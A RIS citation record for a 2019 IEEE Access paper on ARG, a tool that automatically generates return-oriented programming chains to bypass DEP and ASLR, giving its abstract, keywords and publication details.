TY - JOUR
T1 - ARG
T2 - Automatic ROP Chains Generation
AU - Wei, Yuan
AU - Luo, Senlin
AU - Zhuge, Jianwei
AU - Gao, Jing
AU - Zheng, Ennan
AU - Li, Bo
AU - Pan, Limin
N1 - Publisher Copyright:
© 2013 IEEE.
PY - 2019
Y1 - 2019
N2 - Return Oriented Programming (ROP) chains attack has been widely used to bypass Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) protection. However, the generation technology for ROP chains is still in a state of manual coding. While, current techniques for automatically generating ROP chains are still insufficiently researched and have few successful applications. On the other hand, the existing methods are based on using Intermediate Language (IL) which is in order to translate the semantics of original instructions for symbolic execution, and then fill in a predefined gadget arrangement to automatically construct a gadget list. This kind of methods may bring following problems: (1) when converting semantics of original to IL, there is a large amount of overhead time, critical instructions may be discarded; (2) the process of populating a predetermined gadget arrangement is inflexible and may fail to construct ROP chains due to address mismatching. In this paper, we propose the Automatic ROP chains Generation (ARG) which is the first fully automatic ROP chains generation tool without using IL. Tested with data from 6 open-source international Capture The Flag (CTF) competitions and 3 Common Vulnerabilities & Exposures (CVE)s, this technology successfully generated ROP chains for all of them. According to the obtained results, our technique can automatically create ROP payloads and reduce up to 80% of ROP exploit payloads. It takes only 3-5 seconds to exploit successfully, compared to manual analysis for at least 60 minutes, as well as it can effectively bypass both Write XOR Execute (WX) and ASLR.
AB - Return Oriented Programming (ROP) chains attack has been widely used to bypass Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) protection. However, the generation technology for ROP chains is still in a state of manual coding. While, current techniques for automatically generating ROP chains are still insufficiently researched and have few successful applications. On the other hand, the existing methods are based on using Intermediate Language (IL) which is in order to translate the semantics of original instructions for symbolic execution, and then fill in a predefined gadget arrangement to automatically construct a gadget list. This kind of methods may bring following problems: (1) when converting semantics of original to IL, there is a large amount of overhead time, critical instructions may be discarded; (2) the process of populating a predetermined gadget arrangement is inflexible and may fail to construct ROP chains due to address mismatching. In this paper, we propose the Automatic ROP chains Generation (ARG) which is the first fully automatic ROP chains generation tool without using IL. Tested with data from 6 open-source international Capture The Flag (CTF) competitions and 3 Common Vulnerabilities & Exposures (CVE)s, this technology successfully generated ROP chains for all of them. According to the obtained results, our technique can automatically create ROP payloads and reduce up to 80% of ROP exploit payloads. It takes only 3-5 seconds to exploit successfully, compared to manual analysis for at least 60 minutes, as well as it can effectively bypass both Write XOR Execute (WX) and ASLR.
KW - AMOCO
KW - Z3 solver
KW - automatic exploit generation
KW - return oriented programming
KW - satisfiability modulo theories
UR - http://www.scopus.com/inward/record.url?scp=85097336137&partnerID=8YFLogxK
U2 - 10.1109/ACCESS.2019.2937585
DO - 10.1109/ACCESS.2019.2937585
M3 - Article
AN - SCOPUS:85097336137
SN - 2169-3536
VL - 7
SP - 120152
EP - 120163
JO - IEEE Access
JF - IEEE Access
M1 - 8813052
ER -